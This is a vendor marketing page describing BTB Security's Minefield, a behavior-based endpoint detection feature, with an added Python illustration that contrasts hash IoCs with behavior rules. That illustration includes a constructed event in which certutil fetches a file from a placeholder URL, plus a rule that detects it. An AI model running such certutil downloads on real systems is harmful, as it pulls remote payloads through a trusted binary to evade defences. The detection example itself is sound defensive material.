Minefield is designed to identify adversaries on endpoints: it is a series of behavioral indicator "traps" set along the various phases of an attack.
By creating behavior indicator patterns on endpoint operating systems, Minefield serves as a warning system for anomalies triggered by adversaries or compromised accounts as they interact with the operating system or software on the endpoints. Minefield not only incorporates current tactics and techniques from the MITRE ATT&CK framework, it also focuses on core operating system and third-party software patterns to pinpoint potentially malicious behavior.
Minefield covers a wide variety of core operating system processes, including but not limited to popular built-in binaries, commonly referred to as LotL (Living off the Land) binaries, and development tools leveraged in BYOL (Build Your Own Land) tactics. Minefield does not rely on traditional IOCs such as hash values and IP addresses; instead, it relies on the behavior patterns of users and processes on the endpoints. This approach was selected because traditional IOCs are easy to modify, unlike the tactics and techniques used by adversaries. Think how easy it is to change the hash value of a file by simply recompiling it, whereas something like lateral movement always relies on predetermined processes and protocols that cannot be easily avoided or substituted. This approach has proven successful against modern adversaries and has resulted in what is currently 500+ behavioral patterns for endpoints. This number continues to grow as new attack vectors and operating system features are introduced and assessed.
Many traditional monitoring techniques rely heavily on the identification and creation of Indicators of Compromise (IoCs) that the tool, solution, or MSSP then "looks for" within the data it collects and evaluates. These IoCs often consist of very specific data elements that can be easily defeated (i.e., attackers can evade detection) by slightly changing their contents; for example, the hash value of a malicious executable or a target URL. Minefield expands upon RADAR's existing behavior-based detection techniques and considers over 500 unique endpoint behavior patterns that encompass tools, techniques, and procedures associated with the ATT&CK framework, the Living off the Land (LOLBins and GTFOBins) projects, and 20 years of BTB Security red teaming and evasion experience.
IoCs have a place in security monitoring, including in RADAR, but Minefield dramatically changes how BTB Security detects threats, adding resolution and confidence to identified malicious behaviors. Minefield ensures we deliver better outcomes for RADAR clients.
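The hash-versus-behavior argument of the paragraphs above, as an added illustration that is not BTB Security's code and says nothing about how Minefield is implemented: the process events, hash values, binary sets and rule names are all constructed for the example, and a recompiled tool slips past the hash list while the parent/child and command-line patterns still fire.

```python
"""Constructed endpoint process events (not real telemetry) showing why a
hash IoC misses a recompiled tool while a behavior pattern still matches."""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    eid: int
    parent: str      # parent process image name
    image: str       # child process image name
    cmdline: str
    sha256: str      # constructed placeholder, not a real digest


# Hash IoC for one known build of a malicious tool (constructed value).
IOC_HASHES = {"aaaa1111"}

# Assumed sets for this example only, not Minefield's own pattern list.
OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}

EVENTS = [
    # Known build of the tool launched from a document: hash and behavior both hit.
    ProcessEvent(1, "winword.exe", "tool.exe", "tool.exe", "aaaa1111"),
    # Same tool recompiled: the hash changed, so only the behavior rule sees it.
    ProcessEvent(2, "winword.exe", "tool.exe", "tool.exe", "bbbb2222"),
    # Signed built-in binary (LotL) fetching from the network: no hash IoC exists.
    ProcessEvent(3, "cmd.exe", "certutil.exe",
                 "certutil.exe -urlcache -f http://example.invalid/x", "cccc3333"),
    # Routine admin use of the same binary: no alert.
    ProcessEvent(4, "cmd.exe", "certutil.exe", "certutil.exe -hashfile f.txt", "cccc3333"),
]


def match_iocs(events, ioc_hashes=IOC_HASHES):
    """Traditional IoC matching: exact hash lookup only."""
    return [e.eid for e in events if e.sha256 in ioc_hashes]


def office_spawns_child(e):
    """An Office application starting a non-Office process."""
    return e.parent.lower() in OFFICE and e.image.lower() not in OFFICE


def certutil_network_fetch(e):
    """certutil used to pull content from a URL rather than for local tasks."""
    return e.image.lower() == "certutil.exe" and "-urlcache" in e.cmdline.lower()


BEHAVIORS = {"office_spawns_child": office_spawns_child,
             "certutil_network_fetch": certutil_network_fetch}


def match_behaviors(events, behaviors=BEHAVIORS):
    """Behavior matching: patterns survive recompilation because they key on
    how a process is launched and what it does, not on its bytes."""
    return [(name, e.eid) for e in events for name, rule in behaviors.items() if rule(e)]
```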
BTB Security's RADAR continually evolves to stay ahead of the adversaries. Having been designed, developed, and built by Information Security practitioners, RADAR has always considered HOW an adversary behaves. Minefield expands upon this approach to define key behavioral patterns on endpoints along the attack trajectory and notifies BTB Threat Operations to enable an effective response process.
Minefield is proprietary to BTB Security, having been developed 100% in-house by our RIOT Labs group. It's data. It's experience. It's expertise. We hack, we defend, we learn.
As a BTB Security RADAR customer, you're already protected. There's nothing to do, nothing to configure, nothing to install.